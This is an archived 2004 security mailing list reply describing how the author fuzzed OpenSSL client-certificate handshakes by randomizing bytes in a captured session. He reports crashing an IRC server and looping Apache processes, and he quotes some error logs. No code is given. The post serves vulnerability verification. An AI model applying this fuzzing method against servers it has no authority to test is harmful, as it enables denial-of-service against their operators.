lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 08 Jan 2004 23:50:18 +0100
From: "Bram Matthys (Syzop)" <syzop@...nscan.org>
To: "Lachniet, Mark" <mlachniet@...uoianet.com>
Cc: bugtraq@...urityfocus.com, pen-test@...urityfocus.com,
   full-disclosure@...ts.netsys.com
Subject: Re: Openssl proof of concept code?


Hi,

Lachniet, Mark wrote:
> A few months ago, there were issues with the openssl code base, as noted
> on bugtraq and in the following URLs:
> http://www.openssl.org/news/secadv_20031104.txt and
> http://www.openssl.org/news/secadv_20030930.txt.
[..]
> Is anyone aware of a reasonable way for an analyst to definitively
> demonstrate if the vulnerabilities exist in a particular product?  Since
> some of the bugs deal with bad client certificates, some might be as
> easy as getting a copy of a "bad" client certificate and connecting to
> the server using a program such as stunnel, but I have yet to see
> anything about this.

I'm an ircd coder and we have (optional) support for SSL connections
so at that time I was interrested in this issue and was surprised
nobody released a proof of concept code too. A week or so after the
announcement I started looking at it myself.

I won't release my PoC since it's way too ugly, but what I did was
look how a valid SSL handshake took place (with a client certificate)
[I just sniffed a stunnel session w/client certificate]
Then I wrote a C program which does exactly that EXCEPT modifying
some random bytes to random values..
Quite quickly I managed to crash the ircd server (after 5-15 attempts).
I was able to crash it at (at least) 2 different locations.

I also tested it against apache w/SSL but that mainly generated lots
of warning messages, like:
[error] error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
[error] error:0D08403A:asn1 encoding routines:ASN1_TEMPLATE_EX_D2I:nested asn1 error
[error] error:1408900D:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:ASN1 lib
[error] SSL_accept failed
etc...
Besides that it didn't seem to have much effect (no signal 11's..).
After running the program for several hours however I somehow managed
to put some apache childs into a loop, eating 100% cpu and my
load avg. went up to 4 / 5.
Unfortunately I didn't have much time to investigate it.

Hope this helps,

	Bram Matthys (Syzop).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists